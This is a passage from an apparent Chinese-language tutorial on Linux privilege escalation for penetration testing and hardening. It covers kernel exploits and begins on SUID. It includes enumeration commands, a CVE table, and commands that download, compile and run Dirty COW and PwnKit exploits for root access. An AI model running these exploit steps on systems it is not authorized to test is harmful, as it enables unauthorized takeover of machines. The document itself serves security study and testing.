Linux中如何通过常见方法实现权限提升?

摘要:常见Linux权限提升笔记 本文系统介绍Linux系统中常见的权限提升技术,包括检测方法和利用方式,适用于渗透测试和安全加固场景。 目录 1. 内核漏洞提权 2. SUIDSGID提权 3. Sudo配置不当提权 4. 计划任务提权 5.
常见Linux权限提升笔记 本文系统介绍Linux系统中常见的权限提升技术,包括检测方法和利用方式,适用于渗透测试和安全加固场景。 目录 1. 内核漏洞提权 2. SUID/SGID提权 3. Sudo配置不当提权 4. 计划任务提权 5. 环境变量劫持 6. 密码信息泄露 7. 容器逃逸 8. Capabilities提权 9. 数据库高权限提权 10. 提权工具集 1. 内核漏洞提权 💡 原理介绍 内核漏洞提权是利用Linux内核本身存在的安全漏洞,通过编译或运行针对特定内核版本的exploit代码,直接提升至root权限。常见的内核漏洞包括本地权限提升、条件竞争、缓冲区溢出等。 🔍 检测方法 # 获取内核版本信息 uname -a uname -r cat /proc/version cat /etc/issue cat /etc/*-release # 查看系统架构 uname -m # 使用自动化工具检测 # Linux Exploit Suggester wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh # linux-exploit-suggester-2 wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl perl linux-exploit-suggester-2.pl #综合脚本 https://github.com/peass-ng/PEASS-ng ⚔️ 常见内核漏洞 漏洞名称 CVE编号 影响版本 描述 Dirty COW CVE-2016-5195 2.x - 4.8.3 竞态条件导致的写时复制漏洞 Dirty Pipe CVE-2022-0847 5.8 - 5.16.11 管道缓冲区覆盖漏洞 PwnKit CVE-2021-4034 pkexec polkit的pkexec本地提权 Baron Samedit CVE-2021-3156 sudo < 1.9.5p2 sudo堆溢出漏洞 DirtyCred CVE-2022-2588 5.8 - 5.19.x 内核凭证覆盖漏洞 🎯 利用方式 Dirty COW示例: # 下载exploit wget https://github.com/firefart/dirtycow/raw/master/dirty.c gcc -pthread dirty.c -o dirty -lcrypt # 执行提权(会创建新的root用户firefart) ./dirty yourpassword # 使用新密码登录 su firefart PwnKit提权(CVE-2021-4034): # 下载exploit git clone https://github.com/berdav/CVE-2021-4034 cd CVE-2021-4034 make # 执行 ./cve-2021-4034 # 获得root shell ⚠️ 注意事项 内核exploit可能导致系统崩溃,生产环境慎用 编译时需要gcc和内核头文件 注意目标系统架构(x86/x64/ARM)匹配 2. SUID/SGID提权 💡 原理介绍 SUID(Set User ID)和SGID(Set Group ID)是Linux的特殊权限位。当一个可执行文件设置了SUID位,任何用户执行该文件时都会以文件所有者的权限运行。如果一个root拥有的程序设置了SUID位且存在安全问题,普通用户就可能利用它提权到root。
阅读全文